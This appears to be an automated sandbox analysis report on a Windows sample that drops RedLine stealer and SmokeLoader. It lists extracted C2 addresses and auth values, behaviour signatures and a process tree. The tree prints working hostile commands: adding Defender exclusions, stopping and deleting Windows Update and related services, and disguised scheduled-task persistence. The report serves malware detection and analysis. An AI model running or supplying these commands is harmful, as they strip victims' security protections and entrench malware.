Analysis
max time kernel: 152s
max time network: 161s
platform: windows10-1703_x64
resource: win10-20220812-en
resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
submitted: 22-10-2022 16:07
Static task: static1
Behavioral task: behavioral1
Sample: fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
Resource: win10-20220812-en
General
Target: fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
Size: 224KB
MD5: 0d7ef768e438cca7715e0613bc339dc9
SHA1: ddb08e01fe98df1e0d319f88c529b9f59ccab22d
SHA256: fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545
SHA512: 2938185c6ed1b7c640ac8115c7e2d12bca826097eefab41c4ce797f72d5eb81d549b45138256f764e43705511b399d17c6b263957a64ca3778887a6b779b7b66
SSDEEP: 3072:1XL6L1ZL98gb5lOqCKZzrCfpMuGyWIcIpPKuRuTmQJrUCH:x+L3N7BCEHCnRBcgPKQuqurZ
Malware Config
Extracted
Family: redline
Botnet: nam7
C2: 103.89.90.61:34589
auth_value: 533c8fbdab4382453812c73ea2cee5b8

Extracted
Family: redline
Botnet: slovarikinstalls
C2: 78.153.144.3:2510
auth_value: 5f80b2ec82e3bd02a08a3a55d3180551

Extracted
Family: redline
Botnet: Google2
C2: 167.235.71.14:20469
auth_value: fb274d9691235ba015830da570a13578

Extracted
Family: redline
Botnet: Newe
C2: 89.208.106.66:4691
auth_value: e7141b98243e53ec71dadf6344aff038

Extracted
Family: erbium
C2: http://77.73.133.53/cloud/index.php
Signatures
Detects Smokeloader packer (1 IoC)
resource   yara_rule
behavioral1/memory/1804-146-0x0000000002C80000-0x0000000002C89000-memory.dmp   family_smokeloader

Modifies security service (2 TTPs, 5 IoCs)
description   ioc   Process
Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters   reg.exe
Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security   reg.exe
Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0   reg.exe
Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1   reg.exe
Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo   reg.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (14 IoCs)
resource   yara_rule
behavioral1/memory/2828-181-0x00000000001A0000-0x00000000001FC000-memory.dmp   family_redline
behavioral1/memory/4568-183-0x00000000009E0000-0x0000000000A3C000-memory.dmp   family_redline
behavioral1/memory/4780-187-0x0000000001020000-0x000000000107C000-memory.dmp   family_redline
behavioral1/memory/1692-195-0x0000000000400000-0x0000000000428000-memory.dmp   family_redline
behavioral1/memory/4904-197-0x0000000000400000-0x0000000000428000-memory.dmp   family_redline
behavioral1/memory/4848-194-0x00000000003C0000-0x00000000003E8000-memory.dmp   family_redline
behavioral1/memory/4848-215-0x00000000003E21AE-mapping.dmp   family_redline
behavioral1/memory/1692-214-0x0000000000422136-mapping.dmp   family_redline
behavioral1/memory/4904-216-0x0000000000422146-mapping.dmp   family_redline
behavioral1/memory/4780-262-0x0000000001020000-0x000000000107C000-memory.dmp   family_redline
behavioral1/memory/2828-263-0x00000000001A0000-0x00000000001FC000-memory.dmp   family_redline
behavioral1/memory/4568-272-0x00000000009E0000-0x0000000000A3C000-memory.dmp   family_redline
behavioral1/memory/1956-662-0x0000000004B00000-0x0000000004B3E000-memory.dmp   family_redline
behavioral1/memory/1956-821-0x0000000004C50000-0x0000000004C8C000-memory.dmp   family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Downloads MZ/PE file

Drops file in Drivers directory (2 IoCs)
description   ioc   Process
File created   C:\Windows\system32\drivers\etc\hosts   drsdgqksbqkplzynvoxo.exe
File created   C:\Windows\system32\drivers\etc\hosts   updater.exe

Executes dropped EXE (8 IoCs)
pid   Process
2828   343F.exe
4568   37E9.exe
4780   3DA7.exe
1956   41DE.exe
3312   5D66.exe
105248   drsdgqksbqkplzynvoxo.exe
105312   updater.exe
105436   rvrgwau
Stops running service(s) (3 TTPs)

Deletes itself (1 IoC)
pid   Process
3012   Process not Found

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Uses the VBS compiler for execution (1 TTP)

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Suspicious use of SetThreadContext (5 IoCs)
description   pid   Process   procid_target
PID 2828 set thread context of 1692   2828   343F.exe   70
PID 4568 set thread context of 4848   4568   37E9.exe   69
PID 4780 set thread context of 4904   4780   3DA7.exe   71
PID 3312 set thread context of 105044   3312   5D66.exe   84
PID 105312 set thread context of 47776   105312   updater.exe   128

Launches sc.exe (10 IoCs)
Sc.exe is a Windows utility to control services on the system.
pid   Process
105256   sc.exe
105212   sc.exe
105172   sc.exe
105268   sc.exe
89568   sc.exe
35184   sc.exe
105284   sc.exe
105212   sc.exe
105460   sc.exe
105428   sc.exe

Program crash (1 IoC)
pid   pid_target   Process   procid_target
105112   3312   WerFault.exe   73

Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description   ioc   Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
Key queried   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
Key enumerated   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   rvrgwau
Key queried   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   rvrgwau
Key enumerated   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI   rvrgwau

Modifies registry class (1 IoC)
description   ioc   Process
Key created   \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen   Process not Found
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid   Process
1804   fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
1804   fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
pid   Process
3012   Process not Found

Suspicious behavior: MapViewOfSection (20 IoCs)
pid   Process
1804   fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
105436   rvrgwau
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description   pid   Process
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeDebugPrivilege   1956   41DE.exe
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeShutdownPrivilege   3012   Process not Found
Token: SeCreatePagefilePrivilege   3012   Process not Found
Token: SeDebugPrivilege   105364   powershell.exe
Token: SeIncreaseQuotaPrivilege   105364   powershell.exe
Token: SeSecurityPrivilege   105364   powershell.exe
Token: SeTakeOwnershipPrivilege   105364   powershell.exe
Token: SeLoadDriverPrivilege   105364   powershell.exe
Token: SeSystemProfilePrivilege   105364   powershell.exe
Token: SeSystemtimePrivilege   105364   powershell.exe
Token: SeProfSingleProcessPrivilege   105364   powershell.exe
Token: SeIncBasePriorityPrivilege   105364   powershell.exe
Token: SeCreatePagefilePrivilege   105364   powershell.exe
Token: SeBackupPrivilege   105364   powershell.exe
Suspicious use of FindShellTrayWindow (1 IoC)
pid   Process
3012   Process not Found

Suspicious use of SendNotifyMessage (5 IoCs)
pid   Process
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found
3012   Process not Found

Suspicious use of SetWindowsHookEx (1 IoC)
pid   Process
3012   Process not Found
Suspicious use of WriteProcessMemory (64 IoCs)
description   pid   Process   procid_target
PID 3012 wrote to memory of 2828   3012   Process not Found   66
PID 3012 wrote to memory of 2828   3012   Process not Found   66
PID 3012 wrote to memory of 2828   3012   Process not Found   66
PID 3012 wrote to memory of 4568   3012   Process not Found   67
PID 3012 wrote to memory of 4568   3012   Process not Found   67
PID 3012 wrote to memory of 4568   3012   Process not Found   67
PID 3012 wrote to memory of 4780   3012   Process not Found   68
PID 3012 wrote to memory of 4780   3012   Process not Found   68
PID 3012 wrote to memory of 4780   3012   Process not Found   68
PID 3012 wrote to memory of 1956   3012   Process not Found   72
PID 3012 wrote to memory of 1956   3012   Process not Found   72
PID 3012 wrote to memory of 1956   3012   Process not Found   72
PID 4780 wrote to memory of 4904   4780   3DA7.exe   71
PID 4780 wrote to memory of 4904   4780   3DA7.exe   71
PID 4780 wrote to memory of 4904   4780   3DA7.exe   71
PID 4568 wrote to memory of 4848   4568   37E9.exe   69
PID 4568 wrote to memory of 4848   4568   37E9.exe   69
PID 4568 wrote to memory of 4848   4568   37E9.exe   69
PID 2828 wrote to memory of 1692   2828   343F.exe   70
PID 2828 wrote to memory of 1692   2828   343F.exe   70
PID 2828 wrote to memory of 1692   2828   343F.exe   70
PID 4568 wrote to memory of 4848   4568   37E9.exe   69
PID 4780 wrote to memory of 4904   4780   3DA7.exe   71
PID 2828 wrote to memory of 1692   2828   343F.exe   70
PID 2828 wrote to memory of 1692   2828   343F.exe   70
PID 4568 wrote to memory of 4848   4568   37E9.exe   69
PID 4780 wrote to memory of 4904   4780   3DA7.exe   71
PID 3012 wrote to memory of 3312   3012   Process not Found   73
PID 3012 wrote to memory of 3312   3012   Process not Found   73
PID 3012 wrote to memory of 3312   3012   Process not Found   73
PID 3012 wrote to memory of 5068   3012   Process not Found   75
PID 3012 wrote to memory of 5068   3012   Process not Found   75
PID 3012 wrote to memory of 5068   3012   Process not Found   75
PID 3012 wrote to memory of 5068   3012   Process not Found   75
PID 3012 wrote to memory of 4756   3012   Process not Found   76
PID 3012 wrote to memory of 4756   3012   Process not Found   76
PID 3012 wrote to memory of 4756   3012   Process not Found   76
PID 3012 wrote to memory of 15460   3012   Process not Found   77
PID 3012 wrote to memory of 15460   3012   Process not Found   77
PID 3012 wrote to memory of 15460   3012   Process not Found   77
PID 3012 wrote to memory of 15460   3012   Process not Found   77
PID 3012 wrote to memory of 31212   3012   Process not Found   78
PID 3012 wrote to memory of 31212   3012   Process not Found   78
PID 3012 wrote to memory of 31212   3012   Process not Found   78
PID 3012 wrote to memory of 45736   3012   Process not Found   79
PID 3012 wrote to memory of 45736   3012   Process not Found   79
PID 3012 wrote to memory of 45736   3012   Process not Found   79
PID 3012 wrote to memory of 45736   3012   Process not Found   79
PID 3012 wrote to memory of 60628   3012   Process not Found   80
PID 3012 wrote to memory of 60628   3012   Process not Found   80
PID 3012 wrote to memory of 60628   3012   Process not Found   80
PID 3012 wrote to memory of 60628   3012   Process not Found   80
PID 3012 wrote to memory of 74744   3012   Process not Found   81
PID 3012 wrote to memory of 74744   3012   Process not Found   81
PID 3012 wrote to memory of 74744   3012   Process not Found   81
PID 3012 wrote to memory of 74744   3012   Process not Found   81
PID 3012 wrote to memory of 83536   3012   Process not Found   82
PID 3012 wrote to memory of 83536   3012   Process not Found   82
PID 3012 wrote to memory of 83536   3012   Process not Found   82
PID 3012 wrote to memory of 93180   3012   Process not Found   83
PID 3012 wrote to memory of 93180   3012   Process not Found   83
PID 3012 wrote to memory of 93180   3012   Process not Found   83
PID 3012 wrote to memory of 93180   3012   Process not Found   83
PID 3312 wrote to memory of 105044   3312   5D66.exe   84
Processes
(Child processes are indented beneath their parent; each entry lists the image path, the command line, the signatures hit, and the PID.)

C:\Users\Admin\AppData\Local\Temp\fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
  command: "C:\Users\Admin\AppData\Local\Temp\fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe"
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID: 1804

C:\Users\Admin\AppData\Local\Temp\343F.exe
  command: C:\Users\Admin\AppData\Local\Temp\343F.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID: 2828
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      PID: 1692

C:\Users\Admin\AppData\Local\Temp\37E9.exe
  command: C:\Users\Admin\AppData\Local\Temp\37E9.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID: 4568
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      PID: 4848

C:\Users\Admin\AppData\Local\Temp\3DA7.exe
  command: C:\Users\Admin\AppData\Local\Temp\3DA7.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID: 4780
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      PID: 4904

C:\Users\Admin\AppData\Local\Temp\41DE.exe
  command: C:\Users\Admin\AppData\Local\Temp\41DE.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID: 1956

C:\Users\Admin\AppData\Local\Temp\5D66.exe
  command: C:\Users\Admin\AppData\Local\Temp\5D66.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID: 3312
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      PID: 105044
        C:\Users\Admin\AppData\Local\Temp\drsdgqksbqkplzynvoxo.exe
          command: "C:\Users\Admin\AppData\Local\Temp\drsdgqksbqkplzynvoxo.exe"
          - Drops file in Drivers directory
          - Executes dropped EXE
          PID: 105248
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
              - Suspicious use of AdjustPrivilegeToken
              PID: 105364
            C:\Windows\SYSTEM32\cmd.exe
              command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
              PID: 105076
                C:\Windows\system32\sc.exe
                  command: sc stop UsoSvc
                  - Launches sc.exe
                  PID: 105212
                C:\Windows\system32\sc.exe
                  command: sc stop WaaSMedicSvc
                  - Launches sc.exe
                  PID: 105460
                C:\Windows\system32\sc.exe
                  command: sc stop wuauserv
                  - Launches sc.exe
                  PID: 105268
                C:\Windows\system32\sc.exe
                  command: sc stop bits
                  - Launches sc.exe
                  PID: 105428
                C:\Windows\system32\sc.exe
                  command: sc stop dosvc
                  - Launches sc.exe
                  PID: 105284
                C:\Windows\system32\reg.exe
                  command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                  PID: 105432
                C:\Windows\system32\reg.exe
                  command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                  PID: 105208
                C:\Windows\system32\reg.exe
                  command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                  - Modifies security service
                  PID: 105428
                C:\Windows\system32\reg.exe
                  command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                  PID: 944
                C:\Windows\system32\reg.exe
                  command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  PID: 4968
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command: powershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
              PID: 105140
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command: powershell <#btrwhe#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
              PID: 105268
                C:\Windows\system32\schtasks.exe
                  command: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  PID: 101776
    C:\Windows\SysWOW64\WerFault.exe
      command: C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 203184
      - Program crash
      PID: 105112

C:\Windows\SysWOW64\explorer.exe
  command: C:\Windows\SysWOW64\explorer.exe
  PID: 5068

C:\Windows\explorer.exe
  command: C:\Windows\explorer.exe
  PID: 4756

C:\Windows\SysWOW64\explorer.exe
  command: C:\Windows\SysWOW64\explorer.exe
  PID: 15460

C:\Windows\explorer.exe
  command: C:\Windows\explorer.exe
  PID: 31212

C:\Windows\SysWOW64\explorer.exe
  command: C:\Windows\SysWOW64\explorer.exe
  PID: 45736

C:\Windows\SysWOW64\explorer.exe
  command: C:\Windows\SysWOW64\explorer.exe
  PID: 60628

C:\Windows\SysWOW64\explorer.exe
  command: C:\Windows\SysWOW64\explorer.exe
  PID: 74744

C:\Windows\explorer.exe
  command: C:\Windows\explorer.exe
  PID: 83536

C:\Windows\SysWOW64\explorer.exe
  command: C:\Windows\SysWOW64\explorer.exe
  PID: 93180

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  command: C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 105312
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      PID: 105228
    C:\Windows\system32\cmd.exe
      command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      PID: 2832
        C:\Windows\system32\sc.exe
          command: sc stop UsoSvc
          - Launches sc.exe
          PID: 89568
        C:\Windows\system32\sc.exe
          command: sc stop WaaSMedicSvc
          - Launches sc.exe
          PID: 35184
        C:\Windows\system32\sc.exe
          command: sc stop wuauserv
          - Launches sc.exe
          PID: 105256
        C:\Windows\system32\sc.exe
          command: sc stop bits
          - Launches sc.exe
          PID: 105212
        C:\Windows\system32\sc.exe
          command: sc stop dosvc
          - Launches sc.exe
          PID: 105172
        C:\Windows\system32\reg.exe
          command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          PID: 105212
        C:\Windows\system32\reg.exe
          command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
          PID: 105420
        C:\Windows\system32\reg.exe
          command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
          PID: 105144
        C:\Windows\system32\reg.exe
          command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
          PID: 105172
        C:\Windows\system32\reg.exe
          command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
          PID: 105212
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: powershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      PID: 101796
    C:\Windows\system32\conhost.exe
      command: C:\Windows\system32\conhost.exe cuujhamlfzwomvc
      PID: 47776
        C:\Windows\system32\cmd.exe
          command: cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
          PID: 85128
    C:\Windows\system32\cmd.exe
      command: cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
      PID: 105076
        C:\Windows\System32\Wbem\WMIC.exe
          command: wmic PATH Win32_VideoController GET Name, VideoProcessor
          PID: 87500

C:\Users\Admin\AppData\Roaming\rvrgwau
  command: C:\Users\Admin\AppData\Roaming\rvrgwau
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID: 105436
Downloads